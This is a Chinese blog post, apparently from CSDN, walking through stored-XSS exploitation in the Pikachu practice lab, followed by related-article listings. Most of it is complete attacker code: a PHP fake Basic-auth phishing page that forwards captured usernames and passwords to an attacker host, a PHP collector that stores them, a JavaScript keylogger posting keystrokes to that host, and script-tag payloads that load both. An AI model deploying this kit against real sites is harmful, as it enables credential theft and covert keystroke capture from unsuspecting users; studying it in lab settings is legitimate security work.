【xss漏洞】存储型XSS漏洞之钓鱼及键盘记录

最新推荐文章于 2024-06-24 10:58:43 发布
最新推荐文章于 2024-06-24 10:58:43 发布
阅读量639 收藏 2
点赞数 2
分类专栏: XSS漏洞 web安全防护 文章标签: php web 安全 js xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43526443/article/details/105737140
版权

一、攻击方脚本代码

    1. 钓鱼脚本

     1.1.1 弹出伪造验证框脚本

<?php
error_reporting(0);
// var_dump($_SERVER);
if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) {
//发送认证框,并给出迷惑性的info
    header('Content-type:text/html;charset=utf-8');
    header("WWW-Authenticate: Basic realm='认证'");
    header('HTTP/1.0 401 Unauthorized');
    echo 'Authorization Required.';
    exit;
} else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){
//将结果发送给搜集信息的后台,请将这里的IP地址修改为管理后台的IP
    header("Location: http://192.168.88.128/pkxss/xfish/xfish.php?username={$_SERVER[PHP_AUTH_USER]}
    &password={$_SERVER[PHP_AUTH_PW]}");
}

?>

     1.1.2 将用户输入的信息进行处理并保存

<?php
error_reporting(0);
include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

if(!empty($_GET['username']) && !empty($_GET['password'])){

    $username=$_GET['username'];
    $password=$_GET['password'];
    $referer="";
    $referer.=$_SERVER['HTTP_REFERER'];
    $time=date('Y-m-d g:i:s');
    $query="insert fish(time,username,password,referer) values('$time','$username','$password','$referer')";
    $result=mysqli_query($link, $query);
}
?>

    2. 键盘记录脚本

     1.2.1 制作键盘的js,异步发送给键盘记录脚本

function createAjax(){
    var request=false;
    if(window.XMLHttpRequest){
        request=new XMLHttpRequest();
        if(request.overrideMimeType){
            request.overrideMimeType("text/xml");
        }

    }else if(window.ActiveXObject){

        var versions=['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
        for(var i=0; i<versions.length; i++){
            try{
                request=new ActiveXObject(versions[i]);
                if(request){
                    return request;
                }
            }catch(e){
                request=false;
            }
        }
    }
    return request;
}

var ajax=null;
var xl="datax=";

function onkeypress() {
    var realkey = String.fromCharCode(event.keyCode);
    xl+=realkey;
    show();
}

document.onkeypress = onkeypress;

function show() {
    ajax = createAjax();
    ajax.onreadystatechange = function () {
        if (ajax.readyState == 4) {
            if (ajax.status == 200) {
                var data = ajax.responseText;
            } else {
                alert("页面请求失败");
            }
        }
    }

    var postdate = xl;
    ajax.open("POST", "http://192.168.88.128/pkxss/rkeypress/rkserver.php",true);
    ajax.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    ajax.setRequestHeader("Content-length", postdate.length);
    ajax.setRequestHeader("Connection", "close");
    ajax.send(postdate);
}

     1.2.2 将接受的按键记录处理并保存

<?php

include_once '../inc/config.inc.php';
include_once '../inc/mysql.inc.php';
$link=connect();

//设置允许被跨域访问
header("Access-Control-Allow-Origin:*");

$data = $_POST['datax'];
$query = "insert keypress(data) values('$data')";
$result=mysqli_query($link,$query);


?>

二、利用存储型XSS漏洞构建Payload

       直接链接攻击脚本/js,当用户进入被注入漏洞页面自动运行此脚本/js

2.1 钓鱼Payload:<script src="http://192.168.88.128/pkxss/xfish/fish.php"'></script>
2.2 键盘记录Payload:<script src="http://192.168.88.128/pkxss/rkeypress/rk.js"'></script>

在这里插入图片描述

三、被攻击方效果图

3.1 钓鱼效果图

在这里插入图片描述

3.2 键盘记录无显示效果

四、登陆攻击方后台查看

在这里插入图片描述
在这里插入图片描述

土豆.exe
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
XSS漏洞利用---存储XSS钓鱼
Ethan024的博客
03-13 1088
XSS漏洞利用(本文仅供技术学习与分享) 存储XSS漏洞钓鱼 实验准备 pikachu平台为存在XSS漏洞平台的站点; 用户正常访问该站点; 攻击者搭建的,以供收集数据的后台(皮卡丘后台预备好了pkxss平台); 实验思路(使用basic认证做钓鱼) 制作钓鱼鱼儿:WWW Authenticate:Basic 即:在存在XSS漏洞的页面上嵌入请求(JavaScript或其他链接)。当用户点击打开嵌入恶意代码页面的时候,该页面会向后台发送请求,该请求会要求用户返回basic认证。因此在用户界面就会弹出
xss平台搭建源码,xss漏洞练习
06-03
XSS分为反射XSS存储XSS和DOMXSS三种类。反射XSS是通过诱使用户点击含有恶意脚本的链接来触发;存储XSS则是恶意脚本被存储在服务器端,然后在用户查看页面时执行;DOMXSS则是在客户端通过修改DOM对象...
dvwa_xss_储存
weixin_44110913的博客
12-16 490
文章目录一.xss储存概念二.储存图片演示三.代码分析四.dvwa_储存_演练五.总结 一.xss储存概念 黑客发现个人信息或发表文章,等,处存在xss漏洞(并且是储存在数据库中),可以直接插入js代码。 比如在登陆处写下,下图中的代码,发现弹出了我们写的js代码,则说明存在xss储存漏洞,并且是储存到数据库中的。 当发现以后,我们就可以利用该漏洞,写入恶意js代码,当用户点击时,就会盗...
网络攻防|XSS Flash弹窗钓鱼
weixin_42282189的博客
11-15 2771
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的钓鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
存储XSS漏洞源码审计
最新发布
m0_74003366的博客
06-24 897
该路径对应的php文件:monstra-3.0.4/plugins/box/users/views/frontend/edit.view.php。这一行代码中$users变量通过select方法,查询数据库中user_id对于的数据并通过Array的形式返回给先前提到的$user变量。而Array类变量$user在edit.view.php的父文件users.admin.php中第114行定义,如下图。Xss触发路径为/monstra-3.0.4/users/5/edit,
DVWA靶场之XSS通关详解
qq_62169455的博客
06-27 1271
里面的任意字母改为大写即可),此处也可以通过双写(即写两个嵌套的script)来绕过,即在输入框里面输入代码: alert("GXY")
Web安全基础学习:XSS跨站脚本漏洞存储XSS
qq_51862722的博客
06-19 916
存储XSS漏洞:指像留言板、用户名称、日志信息等一些会存储在服务器端的信息,当攻击者在存在存储XSS漏洞的功能点进行注入之后,任何浏览器端加载该信息的时候都会将其中的恶意代码解析,进而触发XSS攻击。该方法甚至可以在管理员审核留言或查看系统信息时触发,进而造成管理员敏感信息的泄露。因为其存储在服务器端,因此造成的危险程度、攻击范围比反射更大更广。留言板、评论区、用户头像、个性签名、登录日志、博客等。
JAVA WEBXSS漏洞详解及防御措施
洛阳泰山的博客
09-06 2097
pom文件依赖 <!--jsoup--> <dependency> <groupId>org.jsoup</groupId> <artifactId>jsoup</artifactId> <version>1.13.1</version> </dependency> 工具类代码
DVWA靶场XSS漏洞存储)LOW级别演示举例
2301_77185537的博客
12-24 475
alert("123")
渗透测试漏洞XSS漏洞
weixin_50651979的博客
04-07 818
2、存储XSS,持久性XSSS,存储XSS是最危险的一种跨站脚本漏洞,当攻击者提交一段代码后,被服务端接收并存储,当攻击者或用户再次访问某个页面时,这段XSS代码被程序读出来响应给浏览器,造成XSS跨站攻击。1、反射XSS 非持久性XSS(一次性),当用户访问一个带有XSS代码 的HTML请求时,服务端接收后处理,然后把带有XSS的数据发送到浏览器,浏览器解析这段带有XSS代码的数据后,造成XSS漏洞。:存储XSS漏洞,由于其持久化特性,容易造成蠕虫病毒的传播,进一步扩大攻击范围。
【网络安全XSS漏洞- XSS基础概述及利用
goldfish8848的博客
06-12 1163
跨站脚本(Cross-site Scripting)攻击,攻击者通过网站注入点注入客户端可执行解析的payload(脚本代码),当用户访问网页时,恶意payload自动加载并执行,以达到攻击者目的(窃取cookie、恶意传播、钓鱼欺骗等)为了避免与HTML中的CSS相混淆,通常称它为XSS
YXcms-含有存储XSS漏洞的源码包
03-17
"YXcms-含有存储XSS漏洞的源码包" 这个标题揭示了我们要讨论的核心内容。YXcms是一个内容管理系统(CMS),它不幸地包含了存储跨站脚本(Stored XSS)的安全漏洞存储XSSXSS攻击的一种类,这种漏洞通常...
(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar
03-24
【标题】"(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar" 暴露了重要的网络安全问题,主要关注的是存储跨站脚本( Stored XSS漏洞。这个标题暗示了该源码包在设计时存在一个关键的安全缺陷,...
efucms-含有存储XSS漏洞的源码包.zip
12-31
标题"efucms-含有存储XSS漏洞的源码包.zip"指出这是一个关于efucms内容管理系统(CMS)的源代码包,特别提到了存在存储跨站脚本(Stored XSS)的安全漏洞存储XSS是一种常见的Web应用安全问题,攻击者可以...
SQL+XSS漏洞修复方案
04-13
XSS分为三种类存储、反射和DOM。修复XSS攻击通常包括以下策略: 1. 对输出内容进行编码或过滤:对HTML、JavaScript和URL特殊字符进行转义,防止它们被浏览器解释为代码。 2. 合理设置HTTP头部:使用...
漏洞预警:CVE-2021-45232 Apache APISIX Dashboard 未授权访问(附批量扫描POC)
热门推荐
weixin_43526443的博客
12-29 7万+
目录 Part1 漏洞描述 Part2 风险等级 Part3 漏洞影响 Part4 漏洞分析 4.1 漏洞源码 4.2 漏洞验证 4.3 POC Part5 修复建议 Part1 漏洞描述 Apache APISIX 是一个动态、实时、高性能的 API 网关,Apache APISIX Dashboard 使用户可通过前端界面操作 Apache APISIX。 在2.10.1之前的Apache APISIX Dashboard中,Manager API使用了两个框架gin和drople
渗透测试指南——工具
weixin_43526443的博客
11-05 6万+
——D&X安全实验室 工欲善其事,必先利其器。回到过去的旧时代,渗透测试是一件非常困难的事,并且需要大量的手动操作。然而如今,渗透测试工具是"安全军火库"中最常使用的装备,一整套的自动化测试工具似乎不仅改造了渗透测试人员,甚至还可以增强计算机的性能,进行比以往更全面的测试。 对渗透测试人员来说不用任何自动化工具对网站或者应用程序进行渗透测试是一件十分困难的事。因此选择一个正确的工具则变得尤为重要,正确的选择甚至占去了渗透测试成功的半壁江山。本篇文章就来和大家介绍一...
Ruijie SSL V P N 垂直越权漏洞
weixin_43526443的博客
03-08 3505
漏洞复现】Ruijie SSL V P N 垂直越权漏洞 目录 【漏洞复现】Ruijie SSL VPN 垂直越权漏洞 1、漏洞简介 2、漏洞影响 3、漏洞复现 4、漏洞批量检测 5、漏洞修复 1、漏洞简介 Ruijie SSL VPN 垂直越权漏洞,攻击者在已知用户名的情况下(默认adm,未知可Burp进行爆破),查看服务器资源,以及对账号进行修改密码和绑定手机操作。 2、漏洞影响 Ruijie SSL VPN 3、漏洞复现 3.1先通过Fofa等方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

土豆.exe

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值